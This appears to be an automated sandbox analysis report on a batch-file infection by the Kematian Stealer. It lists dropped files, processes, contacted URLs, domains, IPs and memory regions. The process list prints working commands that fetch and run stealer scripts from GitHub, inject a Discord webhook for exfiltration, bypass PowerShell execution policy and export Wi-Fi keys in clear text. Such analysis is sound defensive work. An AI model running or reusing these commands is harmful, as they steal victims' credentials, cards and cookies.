Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
pirates.bat
|
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (709), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\kematian.ps1
|
ASCII text, with very long lines (4083), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\temp.vbs
|
ASCII text, with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\NzE0MzRENTYtMTU0OC1FRDNELUFFRTYtQzc1QUVDRDkzQkYw_VVM=_Sk9ORVMtUEM=_MjAyNC0wNy0wNQ==_VVRDLTU=.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\RES4A61.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Jul 5 05:50:52 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_131zpzyd.ao2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1a5vmr5y.2sq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bm1p00h.32h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1i1tugq0.vjt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34u5l0tb.05s.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x05fz0i.xzo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_az14t1sa.5pd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_be03rlz1.vay.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cj1jyvoq.kdm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmbnujjc.fo4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwh02dx0.bdp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etnufafd.yrh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0c21v2z.gen.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k315zlmt.dfr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syrx214o.4vl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tryhonqj.sfv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4dkwuke.wz1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnego4zw.r1s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm3a5dwt.fla.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_znu5b3yu.qat.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\autofill.json
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cards.json
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cookies_netscape_Chrome.txt
|
ASCII text, with very long lines (522)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\discord.json
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\downloads.json
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\history.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.0.cs
|
Unicode text, UTF-8 (with BOM) text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (791), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\passwords.json
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\screenshot.png
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\DomainDetects\Chrome.txt
|
ASCII text, with CRLF, LF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\DomainDetects\Edge.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\DomainDetects\Firefox.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\System.txt
|
Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\productkey.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\screenshot.png (copy)
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\kdotAqIoB.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\kdotPUzdp.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\kdotfQjio.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\kdotkccaDE.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\kdotljBUkx.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\kdotmZyXn.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\kdotnqUTZ.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\kdotqzBNDv.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\kdottNmtN.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
modified
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 47 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -nop -c "Write-Host -NoNewLine $null"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1'
-UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC'
| Out-File -FilePath 'kematian.ps1' -Encoding ASCII"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat')
; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill
/F /IM cmd.exe }"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
|
|
|
|
C:\Windows\System32\wscript.exe
|
wscript /b
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1
|
|
|
|
C:\Windows\System32\netsh.exe
|
"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cscript.exe
|
cscript //nologo temp.vbs
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\find.exe
|
find /i "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\find.exe
|
find /i "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\find.exe
|
find /i "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\net.exe
|
net session
|
||
|
C:\Windows\System32\net1.exe
|
C:\Windows\system32\net1 session
|
||
|
C:\Windows\System32\doskey.exe
|
doskey CALL=SHIFT
|
||
|
C:\Windows\System32\attrib.exe
|
attrib +h +s kematian.ps1
|
||
|
C:\Windows\System32\find.exe
|
find /i "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\find.exe
|
find /i "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\findstr.exe
|
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\find.exe
|
find /i "C:\Users\user\Desktop\pirates.bat"
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp"
"c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
|
There are 33 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1
|
185.199.110.133
|
|
|
|
https://github.com
|
unknown
|
|
|
|
https://raw.githubusercontent.c
|
unknown
|
|
|
|
https://raw.githubusercont
|
unknown
|
|
|
|
https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvx
|
unknown
|
|
|
|
https://raw.githubusercontent.com
|
unknown
|
|
|
|
https://github.com/Somali-Devs/Kematian-Stealer
|
unknown
|
|
|
|
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
|
140.82.121.3
|
|
|
|
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1
|
unknown
|
||
|
https://www.cloudflare.com/cdn-cgi/trace
|
104.16.123.96
|
||
|
http://www.microsoft.cv
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1
|
unknown
|
||
|
http://ip-api.com/json
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://github.cg
|
unknown
|
||
|
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
|
unknown
|
||
|
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
|
140.82.121.3
|
||
|
http://github.com
|
unknown
|
||
|
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1
|
185.199.110.133
|
||
|
https://discord.X
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
http://www.microsoft.
|
unknown
|
||
|
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
|
https://www.cloudflare.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834
|
unknown
|
||
|
https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin
|
140.82.121.3
|
||
|
http://crl.mh
|
unknown
|
||
|
https://github.com/TheWover
|
unknown
|
||
|
https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/kematian_shellcode.ps1
|
unknown
|
||
|
https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
|
unknown
|
||
|
https://objects.githubusercontent.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
|
185.199.110.133
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
https://discord.com/api/webhooks/1241088645289480213/opjqqaosqwrak2j4o5xsc-dugkqcfdvi3tjvq0bt27lstvx
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 47 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
github.com
|
140.82.121.3
|
|
|
|
raw.githubusercontent.com
|
185.199.110.133
|
|
|
|
ip-api.com
|
208.95.112.1
|
|
|
|
171.39.242.20.in-addr.arpa
|
unknown
|
|
|
|
www.cloudflare.com
|
104.16.123.96
|
||
|
objects.githubusercontent.com
|
185.199.111.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
140.82.121.3
|
github.com
|
United States
|
|
|
|
185.199.110.133
|
raw.githubusercontent.com
|
Netherlands
|
|
|
|
104.16.123.96
|
www.cloudflare.com
|
United States
|
||
|
185.199.111.133
|
objects.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
|
ExecutionPolicy
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
201CC037000
|
trusted library allocation
|
page read and write
|
|
|
|
201CC032000
|
trusted library allocation
|
page read and write
|
|
|
|
179D3E94000
|
heap
|
page read and write
|
||
|
2813831B000
|
heap
|
page read and write
|
||
|
97D627F000
|
stack
|
page read and write
|
||
|
7FFD9BB3A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
|
31100BB000
|
stack
|
page read and write
|
||
|
29E52620000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AE00740000
|
heap
|
page read and write
|
||
|
201CA891000
|
heap
|
page read and write
|
||
|
2A8799E1000
|
direct allocation
|
page read and write
|
||
|
201E3330000
|
heap
|
page read and write
|
||
|
28138325000
|
heap
|
page read and write
|
||
|
29E387B0000
|
heap
|
page read and write
|
||
|
17EE78A6000
|
trusted library allocation
|
page read and write
|
||
|
39372FD000
|
stack
|
page read and write
|
||
|
29E4A1E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
2A85A420000
|
heap
|
page readonly
|
||
|
3936D23000
|
stack
|
page read and write
|
||
|
2813BDA0000
|
direct allocation
|
page read and write
|
||
|
17E80379000
|
heap
|
page read and write
|
||
|
1F984580000
|
heap
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
25BE5E40000
|
heap
|
page read and write
|
||
|
2A858A77000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
97D5FBE000
|
stack
|
page read and write
|
||
|
A7569FE000
|
stack
|
page read and write
|
||
|
C00003F000
|
direct allocation
|
page read and write
|
||
|
1F984584000
|
heap
|
page read and write
|
||
|
29E5269D000
|
heap
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
DD0677E000
|
stack
|
page read and write
|
||
|
1EC56CB1000
|
trusted library allocation
|
page read and write
|
||
|
17E802C1000
|
heap
|
page read and write
|
||
|
2813831B000
|
heap
|
page read and write
|
||
|
201CA5C7000
|
heap
|
page execute and read and write
|
||
|
1EC482AC000
|
trusted library allocation
|
page read and write
|
||
|
201E31D0000
|
heap
|
page read and write
|
||
|
FF064FE000
|
stack
|
page read and write
|
||
|
201E32F0000
|
heap
|
page read and write
|
||
|
201DA991000
|
trusted library allocation
|
page read and write
|
||
|
1EC44E50000
|
heap
|
page read and write
|
||
|
29E3BDDF000
|
trusted library allocation
|
page read and write
|
||
|
1EC47050000
|
trusted library allocation
|
page read and write
|
||
|
FAB6F0F000
|
stack
|
page read and write
|
||
|
7FFD9BB6A000
|
trusted library allocation
|
page read and write
|
||
|
1DF582A8000
|
heap
|
page read and write
|
||
|
28138314000
|
heap
|
page read and write
|
||
|
7DF499360000
|
trusted library allocation
|
page execute and read and write
|
||
|
310F6E3000
|
stack
|
page read and write
|
||
|
29E52720000
|
heap
|
page execute and read and write
|
||
|
C000060000
|
direct allocation
|
page read and write
|
||
|
28138392000
|
heap
|
page read and write
|
||
|
1EC5ECBA000
|
heap
|
page read and write
|
||
|
17EE9B32000
|
trusted library allocation
|
page read and write
|
||
|
C000454000
|
direct allocation
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
1EC44D70000
|
heap
|
page read and write
|
||
|
7FFD9BB62000
|
trusted library allocation
|
page read and write
|
||
|
269928C000
|
stack
|
page read and write
|
||
|
201DAB46000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
1EC48536000
|
trusted library allocation
|
page read and write
|
||
|
29E52ACE000
|
heap
|
page read and write
|
||
|
2813BD80000
|
direct allocation
|
page read and write
|
||
|
17EE866A000
|
trusted library allocation
|
page read and write
|
||
|
1EC5EE1E000
|
heap
|
page read and write
|
||
|
2813831B000
|
heap
|
page read and write
|
||
|
7BB73FE000
|
stack
|
page read and write
|
||
|
2A872AC0000
|
heap
|
page read and write
|
||
|
7FFD9B9AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
C000042000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
207C410A000
|
heap
|
page read and write
|
||
|
7FFD9BD1C000
|
trusted library allocation
|
page read and write
|
||
|
17EE5A99000
|
heap
|
page read and write
|
||
|
B7324FC000
|
stack
|
page read and write
|
||
|
2A872D15000
|
heap
|
page read and write
|
||
|
FF05EFE000
|
unkown
|
page read and write
|
||
|
E1F014E000
|
stack
|
page read and write
|
||
|
7BB75FE000
|
stack
|
page read and write
|
||
|
A756BFF000
|
stack
|
page read and write
|
||
|
201CBFC0000
|
trusted library allocation
|
page read and write
|
||
|
29E388B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
1EC47043000
|
trusted library allocation
|
page read and write
|
||
|
C0000C0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
201C8F76000
|
heap
|
page read and write
|
||
|
2A872CC0000
|
heap
|
page read and write
|
||
|
393707F000
|
stack
|
page read and write
|
||
|
C000416000
|
direct allocation
|
page read and write
|
||
|
25BE5D40000
|
heap
|
page read and write
|
||
|
7FFD9BD09000
|
trusted library allocation
|
page read and write
|
||
|
1EC44F40000
|
heap
|
page read and write
|
||
|
1AE1A800000
|
heap
|
page execute and read and write
|
||
|
7DA5C73000
|
stack
|
page read and write
|
||
|
1EC5F0E8000
|
heap
|
page read and write
|
||
|
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
17EE5A20000
|
heap
|
page read and write
|
||
|
1D66E6AA000
|
heap
|
page read and write
|
||
|
201CA8C5000
|
heap
|
page read and write
|
||
|
1F984327000
|
heap
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
201E2FC0000
|
heap
|
page read and write
|
||
|
7FFD9BC2A000
|
trusted library allocation
|
page read and write
|
||
|
16107F40000
|
heap
|
page read and write
|
||
|
2A8746F9000
|
unclassified section
|
page read and write
|
||
|
C000038000
|
direct allocation
|
page read and write
|
||
|
2A874785000
|
unclassified section
|
page read and write
|
||
|
71BC3FD000
|
unkown
|
page read and write
|
||
|
E1EF3F9000
|
stack
|
page read and write
|
||
|
E1EEDFF000
|
stack
|
page read and write
|
||
|
29E4A4CB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA86000
|
trusted library allocation
|
page execute and read and write
|
||
|
C000487000
|
direct allocation
|
page read and write
|
||
|
2066B414000
|
heap
|
page read and write
|
||
|
C0000A4000
|
direct allocation
|
page read and write
|
||
|
C0003A8000
|
direct allocation
|
page read and write
|
||
|
2A8743DF000
|
unclassified section
|
page read and write
|
||
|
7FFD9BD30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB51000
|
trusted library allocation
|
page read and write
|
||
|
29E38A20000
|
heap
|
page read and write
|
||
|
179D3E9C000
|
heap
|
page read and write
|
||
|
2A86A7A1000
|
trusted library allocation
|
page read and write
|
||
|
179D1F70000
|
heap
|
page read and write
|
||
|
2A8743E6000
|
